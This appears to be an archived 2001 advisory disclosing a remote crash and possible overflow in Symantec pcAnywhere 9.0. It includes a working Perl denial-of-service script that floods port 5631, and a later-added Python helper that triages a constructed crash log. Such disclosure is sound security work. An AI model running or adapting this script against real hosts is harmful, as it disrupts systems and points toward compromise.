
scx-sa-14.txt

Posted Feb 14, 2001
Authored by Root-dude | Site securax.org

Securax Security Advisory #14 - Symantec pcAnywhere 9.0 contains a remote denial of service vulnerability. Includes perl exploit.

tags | exploit, remote, denial of service, perl
SHA-256 | f3aabfbdc4849e9d23de5fa5090f05eb0635dac8a1a39400e0f58a1b0dcc758a

=============================================================================
Securax-SA-14 Security Advisory
belgian.networking.security Dutch
=============================================================================
Topic: Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced: 2001-02-08
Affects: Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
=============================================================================



Note: This entire advisory is based on trial-and-error results. We cannot
guarantee that the information below is 100% correct, since we do not have
any source code to audit. This document is subject to change without prior
notice.

If you happen to find more information / problems concerning the problem
below or further variants, please contact me at the following email,
incubus@securax.net, or you can contact info@securax.org.


I. Problem Description
-----------------------

Symantec PcAnywhere is a program that will allow others (who are authorised
to have access :)) to use your pc. It's similar to a Windows NT 4.0 terminal
server.

PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631
(pcanywheredata, according to nmap) and 65301 (pcanywhere). When a user
sends certain data in a particular way, pcAnywhere will crash.

When a large amount of data (the amount varies: sometimes the host will go
down with 320k characters, sometimes you will have to send 500k bytes) is
sent to a 'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will
crash, show an error on the screen, and write an "Unexpected program error"
entry to a logfile. (The entry includes EAX, EBX, ..., so read them; you'll
find the yummy 0x61616161.)

Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.
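
A triage helper for the crash-log register dump mentioned above, added here as an example (not part of the original advisory): it flags registers whose four bytes are all printable ASCII, such as 0x61616161 ("aaaa"), which indicates the register was loaded with bytes from network input. The `REG=hex` log layout and the sample entry are constructed assumptions, since the advisory does not show the real log format.

```python
import re

# Constructed sample of a crash-log entry. The real AWHOST32.EXE log layout
# is not shown in the advisory, so this "REG=hex" format is an assumption.
SAMPLE_LOG = """\
Unexpected program error in AWHOST32.EXE
EAX=61616161 EBX=0063fd54 ECX=61616161 EDX=bffc9490
ESI=00000000 EDI=61616161 EBP=0063fc30 ESP=0063fc08 EIP=bff7a388
"""

REG_RE = re.compile(r"\b(E[A-D]X|E[SD]I|E[BS]P|EIP)=([0-9A-Fa-f]{8})\b")


def parse_registers(text):
    """Return {register: 32-bit value} for every REG=hex pair in the text."""
    return {name: int(value, 16) for name, value in REG_RE.findall(text)}


def looks_like_input(value):
    """True when all four bytes are printable ASCII, i.e. the register
    probably holds bytes copied from network input rather than a pointer."""
    return all(0x20 <= b <= 0x7E for b in value.to_bytes(4, "little"))


def triage(text):
    """Report which registers carry input-like data and rate the crash."""
    regs = parse_registers(text)
    tainted = {r: v.to_bytes(4, "little").decode("ascii")
               for r, v in regs.items() if looks_like_input(v)}
    if "EIP" in tainted:
        severity = "control-flow overwritten: treat as memory corruption"
    elif tainted:
        severity = "registers hold input data: likely memory corruption"
    else:
        severity = "no input-like registers: plain crash"
    return {"tainted": tainted, "severity": severity}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for reg, data in sorted(result["tainted"].items()):
        print(f"{reg} = {data!r}")
    print(result["severity"])
```
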

Why no exploit, just a lame Denial of Service?

1.) because I suck at win32 debugging / overflowing (but I'm reading)
/* so if I can overflow win32 progs, I'll code an exploit */
2.) as the amount of data is variable, it's hard to overflow..

The DoS code:

<--bof-->

#!/usr/bin/perl

# Symantec PcAnywhere 9.0 Denial of Service
# -----------------------------------------
# by incubus <incubus@securax.net>
# http://www.hexyn.be
#
# http://www.securax.net
# All my love to Tessa.
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
# Zym0tic, segfault, #securax@irc.hexyn.be
# Thanks to jurgen swennen, for letting me (ab)use his computer.
#
# this is intended as proof of concept, do not abuse!

use IO::Socket;
$host = "$ARGV[0]";
$port = 5631;
if ($#ARGV<0) {
print "use it like: $0 <hostname>\n";
exit();
}
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
print "hello\n";
$buf = "";
for($counter = 0; $counter < 500000; $counter++) {
$buf .= "\x61";
}
print $socket "$buf\n";
close($socket);
exit();

<--eof-->


II. Impact
----------

If someone exploits this, then Symantec is forced to rename this product to
PcAnyoneAnywhere or something...

No, seriously, this could lead to a compromise of a system.


III. Possible Workarounds
-------------------------

This advisory was also sent to Symantec (info@symantec.com), we'll see what
they do with it...

IV. Credits
-----------
love to Tessa.
greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
and so many, many others I forgot...


=============================================================================
For more information incubus@securax.org
Website http://www.securax.org
Advisories/Text http://www.securax.org/pers
-----------------------------------------------------------------------------
